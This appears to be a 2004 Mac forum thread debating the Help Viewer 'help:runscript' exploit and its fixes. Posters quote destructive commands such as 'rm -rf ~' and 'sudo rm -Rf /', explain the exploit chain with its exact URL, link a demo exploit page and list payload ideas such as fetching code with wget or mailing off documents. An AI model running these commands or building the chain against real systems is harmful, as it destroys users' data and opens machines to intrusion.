I think most anyone will agree that Mac OS X is inherently more secure than Windows, no matter how hard Microsoft tries to fix it. But don't forget that the best security is anonymity... Most hackers and script kiddies grew up on Windows and don't want to waste their time learning the quirks of a new OS especially one that hardly anyone uses. If tens of thousands of people concentrated on breaking Mac OS X, Linux, FreeBSD, Solaris or whatever like they do on Windows, then they're going to find ways in... even if it takes a lot longer.

So you guys can keep telling yourselves that either no one can hack your Mac or that no one will ever really try. As for me, I'm going to buy the Norton Anti-virus for my G5, encrypt my personal data and back it up regularly... just like I do with all my computers, just in case. All it takes is for one creative person to come up with that one nifty worm to ruin your day.

Hmm, I typed in rm -rf ~, smartass. and it doesn't seem to work... ;) :p

HAHAHAHA made my morning

still not really worried; i dont go downloading random dmg files anyway

I think if I saw:
Enter your password when asked or we email your photos to your friends
sudo rm -Rf /
Password:


I'd give 'em what they're asking for...

why wouldn't you just disable airport connection or disconnect bluetooth connection or unplug the ethernet cable? there's no way anyone is sending anything from your computer if it doesn't have network connection?

think, people, think.

i have still not heard of a mac osx VIRUS, by definition: a malicious code that infects your computer without your approval and spreads to another computer without you knowing anything about it, and finally doing something to your computer that you have not asked to.

trojans and such are just showing people's stupidity.

back in the days of 300baud modems everyone (that was using a network connection) knew BY HEART that you should never trust anyting you download to be safe. now (that everyone uses a network connection) hardly nobody (other than the people who knew back then) knows that the network can contain files that are not safe. this is the problem.

if i have a script on my desktop that wipes my whole home directory clean, is it a virus? no. it is a script, made by me, and i would be stupid to run it. is the os insecure because i can make such a script? no. it is a feature that is intended to be used wisely.

if the operating system lets me destroy MY home directory, is it insecure? no. it has given me a right to have files and do whatever i wish with them. is it insecure because i can authorize some malicious code from somewhere-in-the-internet to be run and do anything? no. but i am, if i do such a stupid thing.

there's a joke about this: "user error. replace user and press any key when ready." or, "memory overflow. add memory for user and press any key when ready."

bottom line: it is THE USER who is insecure. stupid things happen for stupid people. click anything if you want anything to happen. click nothing if you want nothing to happen. expect anything (in the internet) to be insecure to be safe. get it?

i wish apple could upgarde users to have a brain ;)

your point exactly.

most viruses, etc, spread through the principles of social engineering. gullible, non-thinking sheepeople spread viruses.

anyone with a brain will never be caught by anything like this.

er.. you know netsky and mydoom? Guess how they spread? They actually get a user to type in a password to decrypt an attached encrypted ZIP file then execute the attachment.

Users are stupid. This fact is proven time and time again.

The correct command is rm -rf ~, smartass.
rm -Rf ~ will start recursively deleting from your HOME FOLDER.

rm -Rf / will start recursively deleting from the root directory.

Point of note is that rm with -f option will not stop if it encounters files it cannot delete for whatever reason, so in other words if you start at the directory root it would delete ALL files that your user account is able to delete.

Still may not be so bad, however considering that many Mac users have a blank password on an administrative user (this is the DEFAULT setup behaviour in OSX) then this is a serious problem.

So what has Apple said to all of this?

No word from them yet.

Well judging from the article it's quite recent, you have to give them some time to respond to it.

Anyway, why not actually read the article and follow some of the exemplry advice from jessefoxperry and take some precautions? First thing you should probably due is go into Safari's preferences and uncheck the "Open Safe files after downloading" check box.

Cheers,

PolarbearTed

So you are implying that the script cannot delete my system, which I can reinstall anytime, only all my private documents, music, photos, etc... which cannot be "reinstalled" unless you've got a backup of the >100GB HDD that usually ship today. A really positive remark...
So you'd rather not have the ability to delete your own files? rm -rf / is there for a reason. It's called unix.

Anyway, these 'viruses' aren't really 'viruses'. Any bozo can write a program that can delete all your files - hell we could do it in C if you're bored of looking at bash or applescripts. It's malicious code true but a virus - I think not. A true mac virus is perfectly possible but these aren't it.

There is NO way in Windows (no way that is not a bug) to bypass an alert window after clicking on a link that points to an .exeOh great... So you are implying that the script cannot delete my system, which I can reinstall anytime, only all my private documents, music, photos, etc... which cannot be "reinstalled" unless you've got a backup of the >100GB HDD that usually ship today. A really positive remark...

Oh please... get real...

IF you don't back up your data you WILL lose everything at some point in the rest of your life. Your hard-drive WILL fail or your computer WILL get stolen or you WILL get hit by a virus, or something.

Something will wipe everything out. It's a 100% certainty.

The platform you use is completely irrelevant. And it's not exactly difficult or expensive to backup to a firewire external drive (or preferably two if you are cautious by nature, and preferably leave one with a friend - it might sound paranoid but once you've been burgled once you get twitchy).

The security flaw discussed here is definitely serious, but at least it is true to say it can only wipe out whatever you have permission to access on a unix system.

And if you don't back that up you're going to lose it one day anyway.

m

Is it too simplistic to download files to a separate partition open them and see what happens. If OK just install in your working partition.

Taking your Help Viewer application in System/Library/CoreServices and placing in on a cd, etc. and removing the original works very well to stop the exploit.

We all talk up how wonderful Mac OS X security is and it is more seucre than Winblows by a thousand percent.

But Apple not providing a sort of firewall for downloads and letting dmg's to automagically appear on our computers is such a security lapse oversight it's beyond beleif.

Who knows what some dumb newbie or kid will doubleclick on?

Actually this exploit has been denomstrated on Slashdot and I personally notified Apple several months ago about it.

If you want to see something scarry, download Little Snitch and watch as Apple's Address Book makes a outgoing connection.

Now WTF is up with that?

Don't get me wrong, I love Apple, but some things don't look all that nice. Is Apple following M$ lead and working for the spooks in DC?

Creepy, now give me back my tinfoil hat.

<snip>Anyway, why not actually read the article and follow some of the exemplry advice from jessefoxperry and take some precautions? First thing you should probably due is go into Safari's preferences and uncheck the "Open Safe files after downloading" check box.
<snip>

Useless as it doesn't stop disk:// links being automounted.

Who the heck makes a URL protocol that can execute shell scripts? Crazy stuff. They must have been assuming that if its a local script then you trust it. Well then they shouldn't make automounting things.

Another way to get a malicious shell script on to someone's machine without using a dmg would be to put in in the public folder of their iDisk. It will be synched to /Volumes/dotmac.user.name/Public where the URL can execute it.

still not really worried; i dont go downloading random dmg files anyway

This is 2004. If someone wants you to download something, all you have to do is navigate to the appropriate page, and the download can start without you explicitly clicking on it.

You can also use this to do the same thing as MisFox. It just does the Helper protocols.

http://www.monkeyfood.com/software/MoreInternet/

It's in the form of a preference pane, which I find more convenient.

/System/Library/CoreServices/Help Viewer

Thank you so much! Typing that in to the finder search box does not find that file (at least on my box) so thanks for pointing me to it.

Still may not be so bad, however considering that many Mac users have a blank password on an administrative user (this is the DEFAULT setup behaviour in OSX) then this is a serious problem.

Uh, no? Last time I did a fresh install (panther, back when it first came out), it asked me for an administrative password, and if I tried to make it blank it told me that wasn't a wise idea (but it would let me do it anyway after making sure I was sure that was what I wanted to do) ;)

If you want to see something scarry, download Little Snitch and watch as Apple's Address Book makes a outgoing connection.

Now WTF is up with that?


LS didn't alert me of anything when I used Address Book. Maybe you were using a feature that needed to make a connection somewhere. :confused:

Forgive me for the semi-trolling rant but...

As for me, I'm going to buy the Norton Anti-virus for my G5, encrypt my personal data and back it up regularly... just like I do with all my computers, just in case. All it takes is for one creative person to come up with that one nifty worm to ruin your day.


That's not really trolling IMHO. Though for a bit of advice avoid anything by Symantec, Norton's hosed my system methodically and periodically every time I tried to to use that line of products (and I've read those novels they call manuals). I back up my system and my fiancee's regularly (every other month), I run Virex before each back up, read my Logs on a biweekly basis, and have not suffered a problem since 10.1 (other than Norton experiments). Enjoy your new Mac, and let me know about the G5's (all I hear are problems people want fixed cause it's what I like to do as a hobby).

well said JFreak. stupid things do happen to stupid people. :D which means i've got nothing to worry about. :p but i wonder what happens to over-confident or complacent people? :eek: ;) :p

Just to put this in perspective...

Mac OSX may have a few "vulnerabilities", but none of these are true viruses or worms. I've used the Mac platform for well over 10 years, and I've never been infected.

OTOH, viruses and worms have been a real nightmare on the PCs I administer at work. In fact, we've had so many problems with viruses and anti-virus software in general that I'm slowly upgrading our machines to Macs.

Really, I don't understand why any MIS/IT person wouldn't seriously consider Macs these days. I guess job security is one possibility, but I've got better things to do than reboot crashed machines and reinstall operating systems trashed by Norton...

:rolleyes: Here's some vulnerabilities from 2001 through 2004:... Let's time this one...

Excellent points. :-)

Just remember, the clock started 23/02/04, so it is ALREADY slow.

You don't call the ability to run a rm -Rf / on your Mac critical??

No more then you being able to put an icon on a batch file and delete your my documents folder on windows.

That is not a vulnerability, it's an idiot trap. Anyone that downloads a program off the internet from a questionable source such as limewire and runs it and looses their home directory is a dingbat and deserves it.

You can do the exact same thing in Windows. You just have it del %allusersprofile%\*.* /FSQ and it'll nuke your entire start menu. Or you could do the same thing to %windir% and it'll start nuking the OS until it hits an open file or two, but the damage is done.

The correct command is rm -rf ~, smartass.

Actually, either are ok. / would do more damage in all likelihood. ~ is your home directory. / is root and on my computer I have a directory named "Volumes" in which my other volumes are located. So with / even they are not safe. -r is recursive, -f is force (e.g. just do it).

LS didn't alert me of anything when I used Address Book. Maybe you were using a feature that needed to make a connection somewhere. :confused:

I can tell you exactly what is going on here. If you add any contacts to your Address Book that have an @mac.com email address or instant message handle, and you do not set a default picture for them, Address Book will connect to homepage.mac.com via HTTP and attempt to fetch their profile picture for you.

There is no giant conspiracy going on here. There is no big brother. Address Book is simply being intelligent about Mac.com entries, and it knows that if someone has an @mac.com email handle, they have a Mac.com account. Missing information about them can be automatically fetched from homepage.mac.com, provided it is available.

Well judging from the article it's quite recent,
First thing you should probably due is go into Safari's preferences and uncheck the "Open Safe files after downloading" check box.


Just three points and a suggestion: ;-)
1. Apple was notified (according to the original description) on 23/02/04, so it isn't "quite recent." It is *just* quite recent that it was publicized. If they'd just found out about it, I'd agree with the point.

2. "Open Safe files" isn't enough! That won't stop many of the methods of using the exploit.

3. The reason why this isn't just "user stupidity" is that with URL spoofing you can trick someone into going to an incorrect URL and downloading the wrong file. Suppose VersionTracker was hacked, sending you the wrong URL.
Likewise, who is trusted? Only Apple? Microsoft too? Adobe? Someone here posted this link: http://www.monkeyfood.com/software/MoreInternet/ I've never heard of it before. Is it a trusted source? Not to me because I don't know who they are. Probably it is, but there is no way to verify it without clicking the download dmg button. Who wants to download the DMG and find out? And if you did it, do I trust you that you actually did it?

A solution (and what I think is perhaps a good one) is to run Help Viewer (or any of the applications that are vulnerable) at a different set of permissions. e.g. It would run them as a different user with no permissions to write (and consequently delete) in any directory, and only read in, say, a particular directory (to avoid looking for personal information to email). This would be a change Apple would need to make, but it would be one solution that would hardly alter the user's experience.

No. But at least Apple's issues are fewer, and patched quicker, than in Windows.

Besides, this issue may not even be real. I'm just now trying the demonstration and it doesn

Quicker?? Apple was notified of this in February. We've had two security updates since then and neither have addressed it. I dont' think they've addressed the problem with AFP either.

I thought I didn't buy windows.... :mad:

oh please. Of all the things that have happened to windows over the last six months compared to two non-propigating trojans (one which is even debatable if it's a 'trojan' or not) this is chump change.

Mac OS X doesn't get hacked & crashed the instant you plug it into a network connection with more than 20 people on it.

Mac OS X doesn't propagate a trojan to everyone in god just by reading an email.

Both of these trojans require user interaction to get started, and neither of them propagate.

And even if they did, that's the first virus in what, 5 years? 10 years?

FWIW, this is how this thing works:

A user is directed to a page that does two things: (1) Downloads a disk image to the user's computer which will hopefully be automounted, and (2) redirects the page to the URL "help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt" with the argument "string='Volumes:0x04_script:0x04_script.term'"

What this does is instructs the Help Viewer application to send the «event helphdhp» AppleEvent to a script file located at a path relative to /Library/Documentation/Help/. If the script file does not respond to this Apple Event, nothing will happen. You cannot use this method to directly execute non-compiled applescript, binary executables, or applescript which is inline with the URL. You have to find a script which responds to «event helphdhp». I imagine that there are not a whole lot of these scripts save for the two bundled with the Help Viewer application itself: OpnApp.scpt and opnbndsig.scpt. It is an unfortunate thing that both of these scripts accept a single argument, and then instruct the Finder to open that argument.

This basically means that you can get the Finder to open any file if you have the path to it. If you want to execute your own code, you have to have it downloaded to a known path first. This is where the disk images come in. When a disk image mounts, it is placed at a known path: /Volumes/[imagename].

- You cannot execute any script on the system with this. Only scripts which respond to the «event helphdhp» AppleEvent can be run.
- You cannot execute inline or non-compiled AppleScript with this. Scripts must be compiled, and must already exist on the victim's machine.
- You cannot execute shell commands with arguments unless you package it all into a .command file and have it downloaded to the victim's computer first.

two non-propigating trojans (one which is even debatable if it's a 'trojan' or not) this is chump change.


The problem is that this could easily be made into a propagating problem combine *with* some of the other vulnerabilities out there.

Here is a question: You get a small DMG from a friend who is in your address book. You presumably trust them. The email says, "I found this great utility to control your internet preferences, to avoid a trojan that hijacks your help viewer. This was just announced today, see <inforword article or whatever>." What do you do? 90% of the people will click it.

What happens to you? It is the trojan itself. Instead of the email, it is the trojan mailing itself out to everyone in your address book - something can EASILY do that. Then it can easily do an rm -rf /.

Or it tries to start up the remote desktop self-start (from the command line there is a command for it).

Or it uses the command line to open up a small additional application on the disk image which can do more.

Or it uses wget (or similar) to download and start something at the command line.

Additional possibilities depending on what it does above and what is on your system:
Or it can open up ports on your firewall or just turn it off.

Or it can install a key stroke recorder and periodically send out "interesting" keystrokes (e.g. anything typed will connected using an SSL connection).

Or it can say "Disk Utility needs your admin password to mount this signed image"? Most people would type it in because OS X has us (I might do it) conditioned to do so. Then it could email (or send via TCP without using your mail program) the admin plus your IP somewhere.

Or it can install a background application to listen on a particular port while re-configuring your firewall to allow that port to be open.

Or it can email documents in your "Documents" folder somewhere. (e.g. just email files < 5K in size. What kind of info is in those files?)

Just because the demo is non-malicious and doesn't exploit all the possibilities doesn't mean they are not there. There are a tons more things it could do from the really subtle so you would never know it to the really damaging and everything in between.

There are enough vulnerabilities out there that it could be done. Worms are easy to write. Viruses are too. Trojans are too. Someone with a good knowledge of Unix could write one to take advantage of 8 to 10 of the most common open vulnerabilities and it would be a huge problem.

Someone who wrote one that exploited 8-10 Unix problems (including Mac and Linux) *and* 8-10 Windows problems would cause complete havoc because there wouldn't be only one method of propagation to stop, there would be multiple routes to infection for just about all of the machines on the net. And if Unix machines are infected, Windows are, and Macs are (and perhaps Cisco router vulnerabilities), how the heck will people get updates to fix them? CD? It could be done and it will be done, it is just a question of when. Up until now you've had amateurs doing it, script kiddies etc.

Hopefully it will remain that way, but I believe at some point there will be someone who decides to exploit many (not just 1 or 2) problems at once, who doesn't make stupid programming errors (e.g. like the Morris Worm or many others), who is based where they don't care (e.g. North Korea or some small, but big-time criminal organization or terrorists) and has a specific malignant purpose. Then many billions of hours of work will be lost or stolen.

FWIW, this is how this thing works:
- You cannot execute shell commands with arguments unless you package it all into a .command file and have it downloaded to the victim's computer first.

Good description, thanks!

What about if the .command file is on the disk image you just downloaded and auto-mounted? To me it seems like that would be enough because you'd know the path, as you said.

There is a clear difference between a remote exploit and protecting users from their own stupidity. How do you propose to go about protecting people from their own misinformed behavior?

Don't run code that didn't ask to have sent to you via email attachment. Don't leave your luggage unattended for any length of time at the airport. Don't use plugged in electronic devices when in the bathtub.

Computers have gotten to be some pretty complicated machines. Given the connectivity that intra/internetworking provides these days, the consequences of your own stupid actions aren't limited to yourself anymore. Other people on the same network have to suffer with you.

Instead of bending over backwards to protect people from themselves, the University I attend has shifted the responsibility to the user. If you want to the join the campus network, then you must complete a competency test. You must demonstrate that you have at least some idea of what you are doing before being connected to everyone else on campus. It makes perfect sense, and we do the same thing to people who want to go out and drive a car on public roads.

There is a clear difference between a remote exploit and protecting users from their own stupidity. How do you propose to go about protecting people from their own misinformed behavior?

Don't run code that didn't ask to have sent to you via email attachment. Don't leave your luggage unattended for any length of time at the airport. Don't use plugged in electronic devices when in the bathtub.

Well, now add to that list:

"Never browse a webpage without having read it's source code."

Because that's all it takes to fall victim to a potential exploit of this vulnerability. No "click to download" step is necessary.

(Of course, I don't know many browsers that will allow you to view a page's source without first viewing the page itself.. so...)

You can also use this to do the same thing as MisFox. It just does the Helper protocols.

http://www.monkeyfood.com/software/MoreInternet/

It's in the form of a preference pane, which I find more convenient.

Thanks for the link, but I am afraid to use it as the only way to get it is by downloading a .dmg file. ;)

Seems like a good temporary fix.

For those people who say that only stupid people would open .dmg files from emails, blah blah blah, I have one question for you: What does being stupid or smart have anything to do with it? Personally, I believe that if you believe the above to be true, you are an idiot in every sense of the word. My stepfather is probably smarter than 95% of you, but he really doesn't know much about computers. Email, some gardening websites, Word, Internet Explorer ( :rolleyes: ), and he's happy about everything. Mp3...what's that? He really doesn't care about "trying out the latest thing."

My mom doesn't know how to turn a computer on, but she's not stupid either. According to her, "I can't find the button on the computer that says "ON/OFF", so I didn't touch anything in case I pressed something that I shouldn't have." Sounds stupid to you, but wait a second....she's right!! There is NO button that says "On/Off". Instead, my PB has a button has markings of a circle with a vertical line that extends from the centre. My brother's desktop has an even more obscure Power button....

Here's the thing: If you post here, YOU ARE AN INTERNET NERD. Instead of saying that only an idiot would open a .exe or .dmg file attachment, why not just accept the fact that you're a nerd and other people aren't "stupid" just because they take no interest in what you find interesting. ;) Being ignorant about computers isn't stupid. Ignorance and stupidity are different. Other than writing email and Word documents, computers are something that many people don't care about, so they won't read pages liket this to find the newest security threats. Gasp!! Can this be true? Oh yes it is, just like you're not good at doing things outside of the internet world, like socializing and understanding differences in experience and knowledge amongst different people, since you don't go out often enough....you sweet nerd, you.

*continues playing Tetris*

Well, now add to that list:

"Never browse a webpage without having read it's source code."

Because that's all it takes to fall victim to a potential exploit of this vulnerability. No "click to download" step is necessary.

(Of course, I don't know many browsers that will allow you to view a page's source without first viewing the page itself.. so...)

Now I never equated this vulnerability to one side or that other. You are making an assumption.

I'm responding to people crying out for measures to protect the users that open every attachment, run everything than can get their hands on, and enter their password at every time its prompted. Users who click willy nilly everywhere they can without really knowing what is going on. Before the mass connectivity of the internet, nobody really cared if you couldn't operate a computer or not. Things have changed. Remember what I said about my Uni. Nobody gets on the network unless they can demonstrate some basic understanding of how to operate a computer, and an understanding of the risks that come with being connected to internet. If you can't do it, you pose a serious risk to not just yourself, but everyone else on the network.

Whose responsibility is it when it comes to these kinds of problems?

Should the companies turn computing into a completely passive experience like watching TV to 'secure' its users, or should more attention be paid into getting users to become familiar with the equipment they just purchased?

anyways, most people tend to not exploit os x security holes, do to the little amount of people it would harm, we are deemed as a group not worth the effort of a virus...You would think some PC Nerd/Anti-Mac Punk would love to make us squirm with a worm.

You would think some PC Nerd/Anti-Mac Punk would love to make us squirm with a worm.
Speaking as a multi-vendor admin I must confess I'm enjoying this exploit; it's nice to see the sneering obnoxious holier-than-thou Mac zealots having their noses rubbed in it for a change :D

What is absolutely HILARIOUS is them all trying to talk it down!

If this were a Microsoft exploit the sky would be falling and those same people would be zealoting (I just made that word up) about how much better the Mac is.

I'm not arguing in the slightest that BSD is inherently more secure than Windows, but there are a lot of drama queens out there.

Now I never equated this vulnerability to one side or that other. You are making an assumption.


Well, this thread is about this vulnerability.. so 'twas a fair assumption.. ;)


I'm responding to people crying out for measures to protect the users that open every attachment, run everything than can get their hands on, and enter their password at every time its prompted. Users who click willy nilly everywhere they can without really knowing what is going on. Before the mass connectivity of the internet, nobody really cared if you couldn't operate a computer or not. Things have changed. Remember what I said about my Uni. Nobody gets on the network unless they can demonstrate some basic understanding of how to operate a computer, and an understanding of the risks that come with being connected to internet. If you can't do it, you pose a serious risk to not just yourself, but everyone else on the network.


Perfectly fair, sensible and reasonable steps. But even those won't protect against more subtle exploits.


Whose responsibility is it when it comes to these kinds of problems?

Should the companies turn computing into a completely passive experience like watching TV to 'secure' its users, or should more attention be paid into getting users to become familiar with the equipment they just purchased?

It's hard to make a generalisation. This specific vulerability is a bug, allowing a remote site to download and run executables on a remote machine is far, far too easy a route to allow. Exploits of this could catch even experienced users.

Educating users is certainly part of the solution. But if users have to spend a significent portion of the day evaluating the risk in every page they visit, every download the make, every email they open, and downloading security patches and virus definitions, then technology has started to be more of a burden than an enabler. More sophisticated exploits will fool even wary users, technology has to improve as well. Technologies such as the NSA's SE Linux might be a indicator of future trends in this regard.

Speaking as a multi-vendor admin I must confess I'm enjoying this exploit; it's nice to see the sneering obnoxious holier-than-thou Mac zealots having their noses rubbed in it for a change :D

What is absolutely HILARIOUS is them all trying to talk it down!

If this were a Microsoft exploit the sky would be falling and those same people would be zealoting (I just made that word up) about how much better the Mac is.

My nose isn't being rubbed in anything. This sort of "vulnerability" is present in any other OS. I could write a script in Windows that starts silently deleting everything on your hard drive in about five minutes and easily convince a computer-illiterate person to click on it. This isn't a virus. It barely fits the description of a trojan. It's not spreadable but by people's ignorance. Apple will close the Help Viewer hole that allows the script to be run and be done with it.

When you work in Linux, it gives you the power to do what you want. I can see where scripting shell commands might be a very useful thing to do. I'm starting to question how useful making scripts auto-executable from the GUI (which have potentially destructive shell commands in them) is, but that's another issue entirely.

--Cless

The problem is the script OpnApp.scpt doesn't do any checking to see what it is opening.

It is used by the help viewer to open applications and documents (such as preference panes.)

Speaking as a multi-vendor admin I must confess I'm enjoying this exploit; it's nice to see the sneering obnoxious holier-than-thou Mac zealots having their noses rubbed in it for a change :D

What is absolutely HILARIOUS is them all trying to talk it down!

If this were a Microsoft exploit the sky would be falling and those same people would be zealoting (I just made that word up) about how much better the Mac is.

I'm not arguing in the slightest that BSD is inherently more secure than Windows, but there are a lot of drama queens out there.

Speaking as a multi-vendor admin I say anything that has the potential to make my job harder and degrade the productivity of the users I support is a bad thing - regardless of platform.

We at Isophonic fixed it:

Isophonic (http://isophonic.net)

We at Isophonic fixed it:

Isophonic (http://isophonic.net)

And why might this not be a hoax? I'm kidding you, but just because some of your other software does the job it says it does, can we believe that the link is even to your site? Oh, the paranoia. I just ran Virex for the first time in weeks too.

Oh yes, and a similar thread was deleted by moderators at the apple discussion boards. :confused: Why would that be? There was no conjecture or double guessing about Apple's next greatest invention going on.

And why might this not be a hoax? I'm kidding you, but just because some of your other software does the job it says it does, can we believe that the link is even to your site? Oh, the paranoia. I just ran Virex for the first time in weeks too.


This bring up a good point. I too want to download the "fixes" for this problem, but I am paranoid about doing it now. Until something comes through my Software Update, I am not really sure what to do. How do we know who we can trust anymore.

I am not really sure what to do. How do we know who we can trust anymore.

You don't have to download this, but I can guarantee you that it only has good intents behind it :)

If you are as paranoid as I am instead of downloading and running an application you don't trust you can always edit the Launch Services preferences plist yourself.

In Jaguar (10.2.8) I added the following to my

~/Library/Preferences/com.apple.LaunchServices.plist


<key>U:help</key>
<array>
<dict>
<key>LSBundleIdentifier</key>
<string>com.adobe.acrobat.reader</string>
<key>LSBundleLocator</key>
<data>
AAAAAADqAAMAAAAAt0av6gAASCsAAAAAAAdaJQAHWhkA
ALmsu7AAAAAAASD//kFQUExDQVJP/////wABABAAB1ol
AAdaIwABTTQAAASwAA4AJgASAEEAYwByAG8AYgBhAHQA
IABSAGUAYQBkAGUAcgAgADUALgAwAA8AGgAMAE0AYQBj
AGkAbgB0AG8AcwBoACAASABEABIARUFwcGxpY2F0aW9u
cy9BY3JvYmF0IFJlYWRlciA1LjAuYXBwL0NvbnRlbnRz
L01hY09TL0Fjcm9iYXQgUmVhZGVyIDUuMAAAEwABLwD/
/wAA
</data>
<key>LSBundleRoleMask</key>
<integer>-1</integer>
<key>LSBundleSignature</key>
<string>CARO</string>
<key>LSBundleVersion</key>
<integer>329215</integer>
</dict>
</array>


so now it will run Adobe Acrobat Reader instead of the Help.app
when the help: protocol its invoked

You probably need to log off and log on again in order to rebuild
the
~/Library/Caches/com.apple.LaunchServices.UserCache.csstore


Have fun

I can vouch for the patch. I only downloaded it because it can be found at Macupdate. Since most of you will be paranoid about clicking on any link I post here, go to Macupdate and check it out yourself. The software is called Don't go there GURLfriend and can be found in the "weekly popular" section of Mac OS X. I installed it and then tried running the exploit that was mentioned at the beginning of this thread. The help viewer app opened, but nothing else happened. No messages of my system being compromised were displayed (as the script is meant to do).

Speaking as a multi-vendor admin I say anything that has the potential to make my job harder and degrade the productivity of the users I support is a bad thing - regardless of platform.
On a professional level, I agree with you wholeheartedly.

On a personal level it's nice to be able to demonstrate to the blind zealots who INSIST that the Mac is invulnerable, that yes, it can, and does, have it's flaws, and those can be exploited just like any other system.

I have a "better" fix than the one isotonic did.

http://users.adelphia.net/~lively/fixbug.dmg

inside of it is an applescript which installs it in all needed files in the help folder (i didn't find any outside of it)

it for the most part preserves the functionality of the help viewer (It can open files but only with your say so and not from ejectable devices.)

The script is readable, and the installer is readable.

<snip>
I could write a script in Windows that starts silently deleting everything on your hard drive in about five minutes and easily convince a computer-illiterate person to click on it. <snip>
Really? A shell script that could be executed silently by a user simply clicking a weblink? On a Windows system that is patched? I don't think so.

No, this Help exploit isn't a virus, however it would make a very good launch mechanism for one.

For example, what if someone were to write a script to plunder a user's address book and send email to all of the people in it, the email naturally containing the script or perhaps simply a web link? (Cant hurt to click a link can it? I mean I have a Mac which means I can't get viruses right?).

Time and again it's proven that users on the whole really are too trusting, especially when they get an email from a friend. This is precisely how NetSky et al spread. Nothing happens automatically, the user is emailed an encrypted ZIP file that contains the virus. (It's encrypted to defeat attachment scanning programs). The user is sent the password to extract the virus, and told that if they click it they will see a naked picture or some other such lie. This has recently been proven to be one of the most successful virus spreading techniques ever. Later versions are getting more sophisticated and are starting to combine techiques to spread more effectively.

Don't buy into the myth that OSX is 100% secure. ALL modern OS's have their problems and require patching if they are going to be exposed to potentially hostile networks and code. If (when?) the Mac ha{d/s} the market share that Windows does, there are one hell of a lot of attackers out there who will attempt to exploit anything they can.

I have a "better" fix than the one isotonic did.

http://users.adelphia.net/~lively/fixbug.dmg

inside of it is an applescript which installs it in all needed files in the help folder (i didn't find any outside of it)
<snip>


... considering you are using a DMG to distribute it, you should have written it to use the exploit to install automatically - it would have been poetically ironic. :D

Really? A shell script that could be executed silently by a user simply clicking a weblink? On a Windows system that is patched? I don't think so.

No, this Help exploit isn't a virus, however it would make a very good launch mechanism for one.

For example, what if someone were to write a script to plunder a user's address book and send email to all of the people in it, the email naturally containing the script or perhaps simply a web link? (Cant hurt to click a link can it? I mean I have a Mac which means I can't get viruses right?).

Time and again it's proven that users on the whole really are too trusting, especially when they get an email from a friend. This is precisely how NetSky et al spread. Nothing happens automatically, the user is emailed an encrypted ZIP file that contains the virus. (It's encrypted to defeat attachment scanning programs). The user is sent the password to extract the virus, and told that if they click it they will see a naked picture or some other such lie. This has recently been proven to be one of the most successful virus spreading techniques ever. Later versions are getting more sophisticated and are starting to combine techiques to spread more effectively.

Don't buy into the myth that OSX is 100% secure. ALL modern OS's have their problems and require patching if they are going to be exposed to potentially hostile networks and code. If (when?) the Mac ha{d/s} the market share that Windows does, there are one hell of a lot of attackers out there who will attempt to exploit anything they can.


If a Virus/Trojan has to be spread through Mail, using the Adress Book It wouldn't hit a big population of Mac Users, just for me would be unusuable, from my adress book I only have one "Mac Friend" the rest are Windows'ers and an applescript file would have no sense, worst a *.dmg file, I think that this whole thread of Mac Trojan/Virus comes from any Antivirus/Firewall Company or maybe from some Pro-MS-Place to create a bad atmosphere before WWDC, nevertheless, it's really neccesary tpo address this kind of issues within our OS, it's has been never a Virus/Trojan, it doesn't come to us, we have to go to it before it can operate, double-clicking or opening a homepage, but spread through an E-mail app would give less than 5% the infection efficiency expected from the writer...

... considering you are using a DMG to distribute it, you should have written it to use the exploit to install automatically - it would have been poetically ironic. :D

God help me, I almost did. :)

Lots of clueless apologists here.

THIS EXPLOIT DOES NOT REQUIRE USERS TO DOWNLOAD AND START SOMETHING MANUALLY.

The exploit is triggered automatically just by visiting a web page (http://www.free-go.net/insecure/safari/0x04_test.html). Do you check links before you click them? (http://tinyurl.com/298vb)

Question for the apologists here: Do you download every web page and analyze it before you open the page with a web browser?

PS: The exploit was reported to Apple TWO MONTHS AGO.

PS: The exploit was reported to Apple TWO MONTHS AGO.

Have you a confirmed source of this? I would like to know why they haven't pathced this if it's true... Hard to get it... :( .. bad for mac-users if they knew about this... I'd like to doubt it...

On a professional level, I agree with you wholeheartedly.

On a personal level it's nice to be able to demonstrate to the blind zealots who INSIST that the Mac is invulnerable, that yes, it can, and does, have it's flaws, and those can be exploited just like any other system.

I'd classify this as a "cheap thrill." Maybe I'm just jealous because my thrills tend to be very expensive.

For the good of the order, somebody with an appropriate level of knowledge should sort through the various competing claims for disabling this vulnerability made in this thread and elsewhere. Until we've got a proper if not more permanent fix from Apple, we need to know what works and what doesn't. Myself, I took the advice of renaming Library/Documentation/Help to something else, because it was the simplest and fastest solution, and didn't require a download, but at this point I don't know what to recommend to other Mac users (and as the informal Mac support guy for miles around, I know I'm going to be asked).

Is it really a vulnerability if the OS is just doing what it was designed and intended to do??? No. This is merely someone exploiting the way the operating system works. The real vulnerability with this is STUPID USERS. :rolleyes:

Is it really a vulnerability if the OS is just doing what it was designed and intended to do??? No. This is merely someone exploiting the way the operating system works. The real vulnerability with this is STUPID USERS. :rolleyes:

You know, I get seriously torked off when the "blame the victim" explanations are trotted out by the Windows benie-brains every time a gaping OS hole appears on that platform, and I like it even less when it happens on the Mac.

Let's be serious here: Apple goofed. Apple needs to fix the goof.

You know, I get seriously torked off when the "blame the victim" explanations are trotted out by the Windows benie-brains every time a gaping OS hole appears on that platform, and I like it even less when it happens on the Mac.

Let's be serious here: Apple goofed. Apple needs to fix the goof.


I disagree. If you aren't aware of proper surfing practices, don't surf.
There are holes everywhere...it is up to the user to be aware, through newsgroups, listservs, websites, magazines etc. Yes, Apple needs to fix the hole, but surfers need to be informed. It's a big net out there, and only the educated will survive. Oh, and my benie-brain sees gaping wounds in your bloated OSX that Apple ignores. Just remember, all OS's SUCK! :cool:

Lots of clueless apologists here.

THIS EXPLOIT DOES NOT REQUIRE USERS TO DOWNLOAD AND START SOMETHING MANUALLY.

The exploit is triggered automatically just by visiting a web page (http://www.free-go.net/insecure/safari/0x04_test.html). Do you check links before you click them? (http://tinyurl.com/298vb)

Question for the apologists here: Do you download every web page and analyze it before you open the page with a web browser?

PS: The exploit was reported to Apple TWO MONTHS AGO.

Personally, I read the relevant information, analyze it, and make an informed decision on what to do. I downloaded the fix with the funny name and nifty icon and patched my system. Now when I click on your link my help viewer opens and that's that. At this point I know that the link is bad and can safely ignore future requests to click on it...
Even if my friends (allegedly) send me an e-mail telling me I should.

"No, really... it WAS an exploit but now it's Barbara Bush nekkid, you'll love it, go ahead and click."

You can also use this to do the same thing as MisFox. It just does the Helper protocols.

http://www.monkeyfood.com/software/MoreInternet/

It's in the form of a preference pane, which I find more convenient.

i like this a lot better. thx for the heads up.

